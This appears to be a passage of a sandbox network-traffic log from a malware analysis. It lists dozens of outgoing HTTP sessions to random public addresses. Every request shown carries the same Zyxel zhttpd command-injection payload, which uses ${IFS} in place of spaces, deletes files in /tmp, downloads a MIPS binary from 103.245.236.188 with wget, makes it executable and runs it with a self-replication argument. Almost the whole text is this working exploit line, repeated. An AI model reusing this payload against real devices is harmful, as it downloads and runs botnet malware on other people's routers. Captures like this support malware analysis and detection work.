                                                Jan 12, 2024 18:16:33.700372934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6956192.168.2.233614486.216.231.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700437069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6957192.168.2.234597849.202.149.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700468063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6958192.168.2.2347592144.177.227.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700510979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6959192.168.2.2334538166.114.91.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700565100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6960192.168.2.2353532150.51.179.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700635910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6961192.168.2.236059887.161.92.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700675011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6962192.168.2.2355544187.82.232.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700733900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6963192.168.2.235564283.216.59.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700771093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6964192.168.2.235595218.147.115.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700822115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6965192.168.2.2343658220.53.1.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700870037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6966192.168.2.234249617.142.228.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700911999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6967192.168.2.233278438.49.215.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.700968981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6968192.168.2.234740668.117.115.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701023102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6969192.168.2.2360890108.187.180.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701086044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6970192.168.2.2348856136.150.152.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701143980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6971192.168.2.2353624172.141.28.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701195002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6972192.168.2.234243269.233.235.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701262951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6973192.168.2.2360484142.123.253.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701332092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6974192.168.2.233812692.133.93.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701401949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6975192.168.2.2346236104.234.134.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701464891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6976192.168.2.235818841.62.239.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701502085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6977192.168.2.2360544118.72.106.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701565027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6978192.168.2.2336024103.97.50.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701611042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6979192.168.2.2343876201.152.80.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701664925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6980192.168.2.2340182170.208.84.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701711893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6981192.168.2.2344682202.21.73.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701780081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6982192.168.2.2354730186.125.24.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701822996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6983192.168.2.2334956139.143.122.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701900005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6984192.168.2.2346344170.34.85.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.701960087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6985192.168.2.233478091.207.122.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702016115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6986192.168.2.2339196108.89.182.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702066898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6987192.168.2.235409295.203.93.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702105999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6988192.168.2.2340928141.202.239.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702169895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6989192.168.2.2346772186.92.106.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702223063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6990192.168.2.2345838182.123.107.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702260017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6991192.168.2.233297468.160.62.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702318907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6992192.168.2.236032068.53.242.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702377081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6993192.168.2.2354508187.112.93.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702436924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6994192.168.2.2334946182.162.61.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702512980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6995192.168.2.2352344211.193.170.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702589035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6996192.168.2.2356238133.38.73.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702646971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6997192.168.2.233471088.91.215.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702697039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6998192.168.2.2353714125.118.103.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702760935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6999192.168.2.235385620.82.181.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702800989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7000192.168.2.2336794186.249.180.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702858925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7001192.168.2.234470062.36.11.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702924013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7002192.168.2.2335516151.217.76.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.702989101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7003192.168.2.234757871.177.231.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703006029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7004192.168.2.2347672182.62.255.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703080893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7005192.168.2.2333356115.170.208.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703144073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7006192.168.2.2358778133.243.146.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703171968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7007192.168.2.234879274.240.86.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703229904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7008192.168.2.2353990210.185.183.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703294992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7009192.168.2.235830668.155.244.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703331947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7010192.168.2.2339522201.65.124.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703383923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7011192.168.2.2338700204.23.141.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703463078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7012192.168.2.2358264220.212.1.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703510046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7013192.168.2.2346302182.164.22.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703583002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7014192.168.2.2343622179.170.32.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703644037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7015192.168.2.233282042.119.51.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703684092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7016192.168.2.235328689.61.177.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703752041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7017192.168.2.2340404174.246.236.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:33.703814030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7018192.168.2.2353690173.133.150.165443
                                                TimestampBytes transferredDirectionData
